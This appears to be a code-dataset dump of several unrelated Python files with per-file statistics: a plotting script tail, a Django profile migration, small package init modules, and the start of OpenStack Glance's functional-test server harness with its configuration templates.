'black_strat'] + 'infection.csv'
infection_array = np.loadtxt(infection_csv, delimiter=',', unpack=True)
# infection_array = np.insert(infection_array, 0, 0.2, axis=1)
avg_infection = np.mean(infection_array, axis=1)
plt.xlabel('Time step')
plt.ylabel('Average infection rate')
# avg_infection = infection_array # if there is only one row
plt.plot(list(range(avg_infection.size)), avg_infection, label=prefix + black_strat)
plt.legend(loc='best', prop={'size': 10})
plt.axis([0, iterations, 0.2, 0.8])
filename = folder + topology + plot_name + '.png'
plt.savefig(filename)
# plt.show()
plt.close()
if __name__ == "__main__":
main() | 29.704188 | 133 | 0.602979 | 1,308 | 11,347 | 4.881498 | 0.110092 | 0.091621 | 0.159749 | 0.103367 | 0.74675 | 0.731088 | 0.720282 | 0.704777 | 0.693814 | 0.686922 | 0 | 0.013716 | 0.254693 | 11,347 | 382 | 134 | 29.704188 | 0.741279 | 0.114391 | 0 | 0.736301 | 1 | 0 | 0.238182 | 0.004778 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013699 | false | 0 | 0.020548 | 0 | 0.034247 | 0.013699 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4c5e41c46a8f658f19b9b4bade40c9d14d0dc499 | 2,264 | py | Python | app/profiles/migrations/0001_initial.py | GaneshPandey/cowmandu | de6c110087d7b0d8ad54dafec0af3d2ab09532e3 | [
"MIT"
] | null | null | null | app/profiles/migrations/0001_initial.py | GaneshPandey/cowmandu | de6c110087d7b0d8ad54dafec0af3d2ab09532e3 | [
"MIT"
] | null | null | null | app/profiles/migrations/0001_initial.py | GaneshPandey/cowmandu | de6c110087d7b0d8ad54dafec0af3d2ab09532e3 | [
"MIT"
] | null | null | null | # Generated by Django 2.2.6 on 2019-10-15 09:09
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='ManagerProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date_of_birth', models.DateField(blank=True, null=True)),
('phone_no', models.CharField(max_length=10)),
('profile_photo', models.ImageField(blank=True, default='profile/profile_default.png', upload_to='profile')),
('cover_photo', models.ImageField(blank=True, default='profile/cover-image/cover_default.jpg', upload_to='profile/cover-image')),
('gender', models.CharField(choices=[('male', 'Male'), ('female', 'Female'), ('other', 'Other')], default='other', max_length=6)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='manager_profile', to=settings.AUTH_USER_MODEL, verbose_name='user')),
],
),
migrations.CreateModel(
name='CustomerProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date_of_birth', models.DateField(blank=True, null=True)),
('phone_no', models.CharField(max_length=10)),
('profile_photo', models.ImageField(blank=True, default='profile/profile_default.png', upload_to='profile')),
('cover_photo', models.ImageField(blank=True, default='profile/cover-image/cover_default.jpg', upload_to='profile/cover-image')),
('gender', models.CharField(choices=[('male', 'Male'), ('female', 'Female'), ('other', 'Other')], default='other', max_length=6)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='customer_profile', to=settings.AUTH_USER_MODEL, verbose_name='user')),
],
),
]
| 53.904762 | 175 | 0.637367 | 251 | 2,264 | 5.577689 | 0.298805 | 0.038571 | 0.06 | 0.074286 | 0.761429 | 0.761429 | 0.761429 | 0.761429 | 0.761429 | 0.697143 | 0 | 0.011699 | 0.207155 | 2,264 | 41 | 176 | 55.219512 | 0.768245 | 0.019876 | 0 | 0.588235 | 1 | 0 | 0.196662 | 0.057736 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.088235 | 0 | 0.205882 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d5be471e8b5fd679ea92f1e068d20e864af22d4a | 20 | py | Python | ml4s/__init__.py | agdelma/ml4s | b3e9dc6b5ffe9d01399e56fd73c6792fe6d57f50 | [
"MIT"
] | null | null | null | ml4s/__init__.py | agdelma/ml4s | b3e9dc6b5ffe9d01399e56fd73c6792fe6d57f50 | [
"MIT"
] | null | null | null | ml4s/__init__.py | agdelma/ml4s | b3e9dc6b5ffe9d01399e56fd73c6792fe6d57f50 | [
"MIT"
] | null | null | null | from .ml4s import *
| 10 | 19 | 0.7 | 3 | 20 | 4.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 0.2 | 20 | 1 | 20 | 20 | 0.8125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d5fc1d766f3b2eea9ec851e2c3b9decdd566421f | 282 | py | Python | bentoml/pytorch.py | francoisserra/BentoML | 213e9e9b39e055286f2649c733907df88e6d2503 | [
"Apache-2.0"
] | 1 | 2021-06-12T17:04:07.000Z | 2021-06-12T17:04:07.000Z | bentoml/pytorch.py | francoisserra/BentoML | 213e9e9b39e055286f2649c733907df88e6d2503 | [
"Apache-2.0"
] | 4 | 2021-05-16T08:06:25.000Z | 2021-11-13T08:46:36.000Z | bentoml/pytorch.py | francoisserra/BentoML | 213e9e9b39e055286f2649c733907df88e6d2503 | [
"Apache-2.0"
] | null | null | null | from ._internal.frameworks.pytorch import load
from ._internal.frameworks.pytorch import save
from ._internal.frameworks.pytorch import load_runner
from ._internal.frameworks.pytorch import PytorchTensorContainer
__all__ = ["PytorchTensorContainer", "load", "load_runner", "save"]
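# Illustrative, hedged usage sketch (assumed signatures at this revision;
# consult the framework docs for the exact API):
#
#   import bentoml.pytorch
#   tag = bentoml.pytorch.save("my_torch_model", model)   # persist a model
#   model = bentoml.pytorch.load(tag)                     # reload the model
#   runner = bentoml.pytorch.load_runner(tag)             # build a serving runner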
| 40.285714 | 67 | 0.826241 | 31 | 282 | 7.193548 | 0.322581 | 0.215247 | 0.394619 | 0.520179 | 0.663677 | 0.349776 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08156 | 282 | 6 | 68 | 47 | 0.861004 | 0 | 0 | 0 | 0 | 0 | 0.14539 | 0.078014 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.8 | 0 | 0.8 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
914d35157b06e84c8c90e46522258e57f5e9885c | 63,287 | py | Python | glance/tests/functional/__init__.py | rajivmucheli/glance | 73742be99944d923031aa5f90e06051126b17007 | [
"Apache-2.0"
] | null | null | null | glance/tests/functional/__init__.py | rajivmucheli/glance | 73742be99944d923031aa5f90e06051126b17007 | [
"Apache-2.0"
] | null | null | null | glance/tests/functional/__init__.py | rajivmucheli/glance | 73742be99944d923031aa5f90e06051126b17007 | [
"Apache-2.0"
] | null | null | null | # Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Base test class for running non-stubbed tests (functional tests)
The FunctionalTest class contains helper methods for starting the API
and Registry server, grabbing the logs of each, cleaning up pidfiles,
and spinning down the servers.
"""
import abc
import atexit
import datetime
import errno
import os
import platform
import shutil
import signal
import six
import socket
import subprocess
import sys
import tempfile
import textwrap
import time
from unittest import mock
import uuid
import fixtures
import glance_store
from os_win import utilsfactory as os_win_utilsfactory
from oslo_config import cfg
from oslo_serialization import jsonutils
# NOTE(jokke): simplified transition to py3, behaves like py2 xrange
from six.moves import range
import six.moves.urllib.parse as urlparse
import testtools
import webob
from glance.common import config
from glance.common import utils
from glance.common import wsgi
from glance.db.sqlalchemy import api as db_api
from glance import tests as glance_tests
from glance.tests import utils as test_utils
execute, get_unused_port = test_utils.execute, test_utils.get_unused_port
tracecmd_osmap = {'Linux': 'strace', 'FreeBSD': 'truss'}
if os.name == 'nt':
SQLITE_CONN_TEMPLATE = 'sqlite:///%s/tests.sqlite'
else:
SQLITE_CONN_TEMPLATE = 'sqlite:////%s/tests.sqlite'
CONF = cfg.CONF
import glance.async_
# NOTE(danms): Default to eventlet threading for tests
try:
glance.async_.set_threadpool_model('eventlet')
except RuntimeError:
pass
@six.add_metaclass(abc.ABCMeta)
class BaseServer(object):
"""
Class used to easily manage starting and stopping
a server during functional test runs.
"""
def __init__(self, test_dir, port, sock=None):
"""
Creates a new Server object.
:param test_dir: The directory where all test stuff is kept. This is
passed from the FunctionalTestCase.
:param port: The port to start a server up on.
"""
self.debug = True
self.no_venv = False
self.test_dir = test_dir
self.bind_port = port
self.conf_file_name = None
self.conf_base = None
self.paste_conf_base = None
self.exec_env = None
self.deployment_flavor = ''
self.show_image_direct_url = False
self.show_multiple_locations = False
self.property_protection_file = ''
self.needs_database = False
self.log_file = None
self.sock = sock
self.fork_socket = True
self.process_pid = None
self.server_module = None
self.stop_kill = False
self.send_identity_credentials = False
def write_conf(self, **kwargs):
"""
Writes the configuration file for the server to its intended
destination. Returns the name of the configuration file and
the over-ridden config content (may be useful for populating
error messages).
"""
if not self.conf_base:
raise RuntimeError("Subclass did not populate config_base!")
conf_override = self.__dict__.copy()
if kwargs:
conf_override.update(**kwargs)
# A config file and paste.ini to use just for this test...we don't want
# to trample on currently-running Glance servers, now do we?
conf_dir = os.path.join(self.test_dir, 'etc')
conf_filepath = os.path.join(conf_dir, "%s.conf" % self.server_name)
if os.path.exists(conf_filepath):
os.unlink(conf_filepath)
paste_conf_filepath = conf_filepath.replace(".conf", "-paste.ini")
if os.path.exists(paste_conf_filepath):
os.unlink(paste_conf_filepath)
utils.safe_mkdirs(conf_dir)
def override_conf(filepath, overridden):
with open(filepath, 'w') as conf_file:
conf_file.write(overridden)
conf_file.flush()
return conf_file.name
overridden_core = self.conf_base % conf_override
self.conf_file_name = override_conf(conf_filepath, overridden_core)
overridden_paste = ''
if self.paste_conf_base:
overridden_paste = self.paste_conf_base % conf_override
override_conf(paste_conf_filepath, overridden_paste)
overridden = ('==Core config==\n%s\n==Paste config==\n%s' %
(overridden_core, overridden_paste))
return self.conf_file_name, overridden
@abc.abstractmethod
def start(self, expect_exit=True, expected_exitcode=0, **kwargs):
pass
@abc.abstractmethod
def stop(self):
pass
def reload(self, expect_exit=True, expected_exitcode=0, **kwargs):
"""
        Stop and restart the service to reload its configuration
Any kwargs passed to this method will override the configuration
value in the conf file used in starting the servers.
"""
self.stop()
return self.start(expect_exit=expect_exit,
expected_exitcode=expected_exitcode, **kwargs)
def create_database(self):
"""Create database if required for this server"""
if self.needs_database:
conf_dir = os.path.join(self.test_dir, 'etc')
utils.safe_mkdirs(conf_dir)
conf_filepath = os.path.join(conf_dir, 'glance-manage.conf')
with open(conf_filepath, 'w') as conf_file:
conf_file.write('[DEFAULT]\n')
conf_file.write('sql_connection = %s' % self.sql_connection)
conf_file.flush()
glance_db_env = 'GLANCE_DB_TEST_SQLITE_FILE'
if glance_db_env in os.environ:
# use the empty db created and cached as a tempfile
# instead of spending the time creating a new one
db_location = os.environ[glance_db_env]
shutil.copyfile(db_location, "%s/tests.sqlite" % self.test_dir)
else:
cmd = ('%s -m glance.cmd.manage --config-file %s db sync' %
(sys.executable, conf_filepath))
execute(cmd, no_venv=self.no_venv, exec_env=self.exec_env,
expect_exit=True)
# copy the clean db to a temp location so that it
# can be reused for future tests
(osf, db_location) = tempfile.mkstemp()
os.close(osf)
shutil.copyfile('%s/tests.sqlite' % self.test_dir, db_location)
os.environ[glance_db_env] = db_location
# cleanup the temp file when the test suite is
# complete
def _delete_cached_db():
try:
os.remove(os.environ[glance_db_env])
except Exception:
glance_tests.logger.exception(
"Error cleaning up the file %s" %
os.environ[glance_db_env])
atexit.register(_delete_cached_db)
def dump_log(self):
if not self.log_file:
return "log_file not set for {name}".format(name=self.server_name)
elif not os.path.exists(self.log_file):
return "{log_file} for {name} did not exist".format(
log_file=self.log_file, name=self.server_name)
with open(self.log_file, 'r') as fptr:
return fptr.read().strip()
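# Illustrative sketch (an assumption, not part of the original module): the
# minimal contract a BaseServer subclass must satisfy -- populate
# self.conf_base so write_conf() has a template, and implement the abstract
# start()/stop(). The concrete PosixServer/Win32Server classes below are the
# real implementations.
class _SketchServer(BaseServer):
    def __init__(self, test_dir, port, sock=None):
        super(_SketchServer, self).__init__(test_dir, port, sock=sock)
        self.server_name = 'sketch'
        # write_conf() raises RuntimeError unless conf_base is populated.
        self.conf_base = """[DEFAULT]
debug = %(debug)s
"""

    def start(self, expect_exit=True, expected_exitcode=0, **kwargs):
        # A real subclass would fork/exec the server here; see PosixServer.
        self.write_conf(**kwargs)
        return (0, '', '')

    def stop(self):
        return (0, '', '')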
class PosixServer(BaseServer):
def start(self, expect_exit=True, expected_exitcode=0, **kwargs):
"""
Starts the server.
Any kwargs passed to this method will override the configuration
value in the conf file used in starting the servers.
"""
# Ensure the configuration file is written
self.write_conf(**kwargs)
self.create_database()
cmd = ("%(server_module)s --config-file %(conf_file_name)s"
% {"server_module": self.server_module,
"conf_file_name": self.conf_file_name})
cmd = "%s -m %s" % (sys.executable, cmd)
# close the sock and release the unused port closer to start time
if self.exec_env:
exec_env = self.exec_env.copy()
else:
exec_env = {}
pass_fds = set()
if self.sock:
if not self.fork_socket:
self.sock.close()
self.sock = None
else:
fd = os.dup(self.sock.fileno())
exec_env[utils.GLANCE_TEST_SOCKET_FD_STR] = str(fd)
pass_fds.add(fd)
self.sock.close()
self.process_pid = test_utils.fork_exec(cmd,
logfile=os.devnull,
exec_env=exec_env,
pass_fds=pass_fds)
self.stop_kill = not expect_exit
if self.pid_file:
pf = open(self.pid_file, 'w')
pf.write('%d\n' % self.process_pid)
pf.close()
if not expect_exit:
rc = 0
try:
os.kill(self.process_pid, 0)
except OSError:
raise RuntimeError("The process did not start")
else:
rc = test_utils.wait_for_fork(
self.process_pid,
expected_exitcode=expected_exitcode,
force=False)
# avoid an FD leak
if self.sock:
os.close(fd)
self.sock = None
return (rc, '', '')
def stop(self):
"""
Spin down the server.
"""
if not self.process_pid:
            raise Exception('Server "%s" process not running.'
                            % self.server_name)
if self.stop_kill:
os.kill(self.process_pid, signal.SIGTERM)
rc = test_utils.wait_for_fork(self.process_pid, raise_error=False,
force=self.stop_kill)
return (rc, '', '')
class Win32Server(BaseServer):
def __init__(self, *args, **kwargs):
super(Win32Server, self).__init__(*args, **kwargs)
self._processutils = os_win_utilsfactory.get_processutils()
def start(self, expect_exit=True, expected_exitcode=0, **kwargs):
"""
Starts the server.
Any kwargs passed to this method will override the configuration
value in the conf file used in starting the servers.
"""
# Ensure the configuration file is written
self.write_conf(**kwargs)
self.create_database()
cmd = ("%(server_module)s --config-file %(conf_file_name)s"
% {"server_module": self.server_module,
"conf_file_name": self.conf_file_name})
cmd = "%s -m %s" % (sys.executable, cmd)
# Passing socket objects on Windows is a bit more cumbersome.
# We don't really have to do it.
if self.sock:
self.sock.close()
self.sock = None
self.process = subprocess.Popen(
cmd,
env=self.exec_env)
self.process_pid = self.process.pid
try:
self.job_handle = self._processutils.kill_process_on_job_close(
self.process_pid)
except Exception:
# Could not associate child process with a job, killing it.
self.process.kill()
raise
self.stop_kill = not expect_exit
if self.pid_file:
pf = open(self.pid_file, 'w')
pf.write('%d\n' % self.process_pid)
pf.close()
rc = 0
if expect_exit:
self.process.communicate()
rc = self.process.returncode
return (rc, '', '')
def stop(self):
"""
Spin down the server.
"""
if not self.process_pid:
raise Exception('Server "%s" process not running.'
% self.server_name)
if self.stop_kill:
self.process.terminate()
return (0, '', '')
if os.name == 'nt':
Server = Win32Server
else:
Server = PosixServer
class ApiServer(Server):
"""
Server object that starts/stops/manages the API server
"""
def __init__(self, test_dir, port, policy_file, delayed_delete=False,
pid_file=None, sock=None, **kwargs):
super(ApiServer, self).__init__(test_dir, port, sock=sock)
self.server_name = 'api'
self.server_module = 'glance.cmd.%s' % self.server_name
self.default_store = kwargs.get("default_store", "file")
self.bind_host = "127.0.0.1"
self.metadata_encryption_key = "012345678901234567890123456789ab"
self.image_dir = os.path.join(self.test_dir, "images")
self.pid_file = pid_file or os.path.join(self.test_dir, "api.pid")
self.log_file = os.path.join(self.test_dir, "api.log")
self.image_size_cap = 1099511627776
self.delayed_delete = delayed_delete
self.owner_is_tenant = True
self.workers = 0
self.scrub_time = 5
self.image_cache_dir = os.path.join(self.test_dir,
'cache')
self.image_cache_driver = 'sqlite'
self.policy_file = policy_file
self.policy_default_rule = 'default'
self.property_protection_rule_format = 'roles'
self.image_member_quota = 10
self.image_property_quota = 10
self.image_tag_quota = 10
self.image_location_quota = 2
self.disable_path = None
self.needs_database = True
default_sql_connection = SQLITE_CONN_TEMPLATE % self.test_dir
self.sql_connection = os.environ.get('GLANCE_TEST_SQL_CONNECTION',
default_sql_connection)
self.user_storage_quota = '0'
self.lock_path = self.test_dir
self.location_strategy = 'location_order'
self.store_type_location_strategy_preference = ""
self.send_identity_headers = False
self.conf_base = """[DEFAULT]
debug = %(debug)s
default_log_levels = eventlet.wsgi.server=DEBUG,stevedore.extension=INFO
bind_host = %(bind_host)s
bind_port = %(bind_port)s
metadata_encryption_key = %(metadata_encryption_key)s
send_identity_credentials = %(send_identity_credentials)s
log_file = %(log_file)s
image_size_cap = %(image_size_cap)d
delayed_delete = %(delayed_delete)s
owner_is_tenant = %(owner_is_tenant)s
workers = %(workers)s
scrub_time = %(scrub_time)s
send_identity_headers = %(send_identity_headers)s
image_cache_dir = %(image_cache_dir)s
image_cache_driver = %(image_cache_driver)s
sql_connection = %(sql_connection)s
show_image_direct_url = %(show_image_direct_url)s
show_multiple_locations = %(show_multiple_locations)s
user_storage_quota = %(user_storage_quota)s
lock_path = %(lock_path)s
property_protection_file = %(property_protection_file)s
property_protection_rule_format = %(property_protection_rule_format)s
image_member_quota=%(image_member_quota)s
image_property_quota=%(image_property_quota)s
image_tag_quota=%(image_tag_quota)s
image_location_quota=%(image_location_quota)s
location_strategy=%(location_strategy)s
allow_additional_image_properties = True
[oslo_policy]
policy_file = %(policy_file)s
policy_default_rule = %(policy_default_rule)s
[paste_deploy]
flavor = %(deployment_flavor)s
[store_type_location_strategy]
store_type_preference = %(store_type_location_strategy_preference)s
[glance_store]
filesystem_store_datadir=%(image_dir)s
default_store = %(default_store)s
[import_filtering_opts]
allowed_ports = []
"""
self.paste_conf_base = """[pipeline:glance-api]
pipeline =
cors
healthcheck
versionnegotiation
gzip
unauthenticated-context
rootapp
[pipeline:glance-api-caching]
pipeline = cors healthcheck versionnegotiation gzip unauthenticated-context
cache rootapp
[pipeline:glance-api-cachemanagement]
pipeline =
cors
healthcheck
versionnegotiation
gzip
unauthenticated-context
cache
cache_manage
rootapp
[pipeline:glance-api-fakeauth]
pipeline = cors healthcheck versionnegotiation gzip fakeauth context rootapp
[pipeline:glance-api-noauth]
pipeline = cors healthcheck versionnegotiation gzip context rootapp
[composite:rootapp]
paste.composite_factory = glance.api:root_app_factory
/: apiversions
/v2: apiv2app
[app:apiversions]
paste.app_factory = glance.api.versions:create_resource
[app:apiv2app]
paste.app_factory = glance.api.v2.router:API.factory
[filter:healthcheck]
paste.filter_factory = oslo_middleware:Healthcheck.factory
backends = disable_by_file
disable_by_file_path = %(disable_path)s
[filter:versionnegotiation]
paste.filter_factory =
glance.api.middleware.version_negotiation:VersionNegotiationFilter.factory
[filter:gzip]
paste.filter_factory = glance.api.middleware.gzip:GzipMiddleware.factory
[filter:cache]
paste.filter_factory = glance.api.middleware.cache:CacheFilter.factory
[filter:cache_manage]
paste.filter_factory =
glance.api.middleware.cache_manage:CacheManageFilter.factory
[filter:context]
paste.filter_factory = glance.api.middleware.context:ContextMiddleware.factory
[filter:unauthenticated-context]
paste.filter_factory =
glance.api.middleware.context:UnauthenticatedContextMiddleware.factory
[filter:fakeauth]
paste.filter_factory = glance.tests.utils:FakeAuthMiddleware.factory
[filter:cors]
paste.filter_factory = oslo_middleware.cors:filter_factory
allowed_origin=http://valid.example.com
"""
class ApiServerForMultipleBackend(Server):
"""
Server object that starts/stops/manages the API server
"""
def __init__(self, test_dir, port, policy_file, delayed_delete=False,
pid_file=None, sock=None, **kwargs):
super(ApiServerForMultipleBackend, self).__init__(
test_dir, port, sock=sock)
self.server_name = 'api'
self.server_module = 'glance.cmd.%s' % self.server_name
self.default_backend = kwargs.get("default_backend", "file1")
self.bind_host = "127.0.0.1"
self.metadata_encryption_key = "012345678901234567890123456789ab"
self.image_dir_backend_1 = os.path.join(self.test_dir, "images_1")
self.image_dir_backend_2 = os.path.join(self.test_dir, "images_2")
self.image_dir_backend_3 = os.path.join(self.test_dir, "images_3")
self.staging_dir = os.path.join(self.test_dir, "staging")
self.pid_file = pid_file or os.path.join(self.test_dir,
"multiple_backend_api.pid")
self.log_file = os.path.join(self.test_dir, "multiple_backend_api.log")
self.image_size_cap = 1099511627776
self.delayed_delete = delayed_delete
self.owner_is_tenant = True
self.workers = 0
self.scrub_time = 5
self.image_cache_dir = os.path.join(self.test_dir,
'cache')
self.image_cache_driver = 'sqlite'
self.policy_file = policy_file
self.policy_default_rule = 'default'
self.property_protection_rule_format = 'roles'
self.image_member_quota = 10
self.image_property_quota = 10
self.image_tag_quota = 10
self.image_location_quota = 2
self.disable_path = None
self.needs_database = True
default_sql_connection = SQLITE_CONN_TEMPLATE % self.test_dir
self.sql_connection = os.environ.get('GLANCE_TEST_SQL_CONNECTION',
default_sql_connection)
self.user_storage_quota = '0'
self.lock_path = self.test_dir
self.location_strategy = 'location_order'
self.store_type_location_strategy_preference = ""
self.send_identity_headers = False
self.conf_base = """[DEFAULT]
debug = %(debug)s
default_log_levels = eventlet.wsgi.server=DEBUG,stevedore.extension=INFO
bind_host = %(bind_host)s
bind_port = %(bind_port)s
metadata_encryption_key = %(metadata_encryption_key)s
send_identity_credentials = %(send_identity_credentials)s
log_file = %(log_file)s
image_size_cap = %(image_size_cap)d
delayed_delete = %(delayed_delete)s
owner_is_tenant = %(owner_is_tenant)s
workers = %(workers)s
scrub_time = %(scrub_time)s
send_identity_headers = %(send_identity_headers)s
image_cache_dir = %(image_cache_dir)s
image_cache_driver = %(image_cache_driver)s
sql_connection = %(sql_connection)s
show_image_direct_url = %(show_image_direct_url)s
show_multiple_locations = %(show_multiple_locations)s
user_storage_quota = %(user_storage_quota)s
lock_path = %(lock_path)s
property_protection_file = %(property_protection_file)s
property_protection_rule_format = %(property_protection_rule_format)s
image_member_quota=%(image_member_quota)s
image_property_quota=%(image_property_quota)s
image_tag_quota=%(image_tag_quota)s
image_location_quota=%(image_location_quota)s
location_strategy=%(location_strategy)s
allow_additional_image_properties = True
enabled_backends=file1:file,file2:file,file3:file
[oslo_policy]
policy_file = %(policy_file)s
policy_default_rule = %(policy_default_rule)s
[paste_deploy]
flavor = %(deployment_flavor)s
[store_type_location_strategy]
store_type_preference = %(store_type_location_strategy_preference)s
[glance_store]
default_backend = %(default_backend)s
[file1]
filesystem_store_datadir=%(image_dir_backend_1)s
[file2]
filesystem_store_datadir=%(image_dir_backend_2)s
[file3]
filesystem_store_datadir=%(image_dir_backend_3)s
[import_filtering_opts]
allowed_ports = []
[os_glance_staging_store]
filesystem_store_datadir=%(staging_dir)s
"""
self.paste_conf_base = """[pipeline:glance-api]
pipeline =
cors
healthcheck
versionnegotiation
gzip
unauthenticated-context
rootapp
[pipeline:glance-api-caching]
pipeline = cors healthcheck versionnegotiation gzip unauthenticated-context
cache rootapp
[pipeline:glance-api-cachemanagement]
pipeline =
cors
healthcheck
versionnegotiation
gzip
unauthenticated-context
cache
cache_manage
rootapp
[pipeline:glance-api-fakeauth]
pipeline = cors healthcheck versionnegotiation gzip fakeauth context rootapp
[pipeline:glance-api-noauth]
pipeline = cors healthcheck versionnegotiation gzip context rootapp
[composite:rootapp]
paste.composite_factory = glance.api:root_app_factory
/: apiversions
/v2: apiv2app
[app:apiversions]
paste.app_factory = glance.api.versions:create_resource
[app:apiv2app]
paste.app_factory = glance.api.v2.router:API.factory
[filter:healthcheck]
paste.filter_factory = oslo_middleware:Healthcheck.factory
backends = disable_by_file
disable_by_file_path = %(disable_path)s
[filter:versionnegotiation]
paste.filter_factory =
glance.api.middleware.version_negotiation:VersionNegotiationFilter.factory
[filter:gzip]
paste.filter_factory = glance.api.middleware.gzip:GzipMiddleware.factory
[filter:cache]
paste.filter_factory = glance.api.middleware.cache:CacheFilter.factory
[filter:cache_manage]
paste.filter_factory =
glance.api.middleware.cache_manage:CacheManageFilter.factory
[filter:context]
paste.filter_factory = glance.api.middleware.context:ContextMiddleware.factory
[filter:unauthenticated-context]
paste.filter_factory =
glance.api.middleware.context:UnauthenticatedContextMiddleware.factory
[filter:fakeauth]
paste.filter_factory = glance.tests.utils:FakeAuthMiddleware.factory
[filter:cors]
paste.filter_factory = oslo_middleware.cors:filter_factory
allowed_origin=http://valid.example.com
"""
class ScrubberDaemon(Server):
"""
Server object that starts/stops/manages the Scrubber server
"""
def __init__(self, test_dir, policy_file, daemon=False, **kwargs):
# NOTE(jkoelker): Set the port to 0 since we actually don't listen
super(ScrubberDaemon, self).__init__(test_dir, 0)
self.server_name = 'scrubber'
self.server_module = 'glance.cmd.%s' % self.server_name
self.daemon = daemon
self.image_dir = os.path.join(self.test_dir, "images")
self.scrub_time = 5
self.pid_file = os.path.join(self.test_dir, "scrubber.pid")
self.log_file = os.path.join(self.test_dir, "scrubber.log")
self.metadata_encryption_key = "012345678901234567890123456789ab"
self.lock_path = self.test_dir
default_sql_connection = SQLITE_CONN_TEMPLATE % self.test_dir
self.sql_connection = os.environ.get('GLANCE_TEST_SQL_CONNECTION',
default_sql_connection)
self.policy_file = policy_file
self.policy_default_rule = 'default'
self.send_identity_headers = False
self.conf_base = """[DEFAULT]
debug = %(debug)s
log_file = %(log_file)s
daemon = %(daemon)s
wakeup_time = 2
scrub_time = %(scrub_time)s
metadata_encryption_key = %(metadata_encryption_key)s
lock_path = %(lock_path)s
sql_connection = %(sql_connection)s
sql_idle_timeout = 3600
[glance_store]
filesystem_store_datadir=%(image_dir)s
[oslo_policy]
policy_file = %(policy_file)s
policy_default_rule = %(policy_default_rule)s
"""
def start(self, expect_exit=True, expected_exitcode=0, **kwargs):
if 'daemon' in kwargs:
expect_exit = False
return super(ScrubberDaemon, self).start(
expect_exit=expect_exit,
expected_exitcode=expected_exitcode,
**kwargs)
class FunctionalTest(test_utils.BaseTestCase):
"""
Base test class for any test that wants to test the actual
servers and clients and not just the stubbed out interfaces
"""
inited = False
disabled = False
launched_servers = []
def setUp(self):
super(FunctionalTest, self).setUp()
self.test_dir = self.useFixture(fixtures.TempDir()).path
self.api_protocol = 'http'
self.api_port, api_sock = test_utils.get_unused_port_and_socket()
# NOTE: Scrubber is enabled by default for the functional tests.
        # Please disable it by explicitly setting 'self.include_scrubber' to
# False in the test SetUps that do not require Scrubber to run.
self.include_scrubber = True
# The clients will try to connect to this address. Let's make sure
# we're not using the default '0.0.0.0'
self.config(bind_host='127.0.0.1')
self.tracecmd = tracecmd_osmap.get(platform.system())
conf_dir = os.path.join(self.test_dir, 'etc')
utils.safe_mkdirs(conf_dir)
self.copy_data_file('schema-image.json', conf_dir)
self.copy_data_file('policy.json', conf_dir)
self.copy_data_file('property-protections.conf', conf_dir)
self.copy_data_file('property-protections-policies.conf', conf_dir)
self.property_file_roles = os.path.join(conf_dir,
'property-protections.conf')
property_policies = 'property-protections-policies.conf'
self.property_file_policies = os.path.join(conf_dir,
property_policies)
self.policy_file = os.path.join(conf_dir, 'policy.json')
self.api_server = ApiServer(self.test_dir,
self.api_port,
self.policy_file,
sock=api_sock)
self.scrubber_daemon = ScrubberDaemon(self.test_dir, self.policy_file)
self.pid_files = [self.api_server.pid_file,
self.scrubber_daemon.pid_file]
self.files_to_destroy = []
self.launched_servers = []
# Keep track of servers we've logged so we don't double-log them.
self._attached_server_logs = []
self.addOnException(self.add_log_details_on_exception)
if not self.disabled:
# We destroy the test data store between each test case,
# and recreate it, which ensures that we have no side-effects
# from the tests
self.addCleanup(
self._reset_database, self.api_server.sql_connection)
self.addCleanup(self.cleanup)
self._reset_database(self.api_server.sql_connection)
def set_policy_rules(self, rules):
fap = open(self.policy_file, 'w')
fap.write(jsonutils.dumps(rules))
fap.close()
def _reset_database(self, conn_string):
conn_pieces = urlparse.urlparse(conn_string)
if conn_string.startswith('sqlite'):
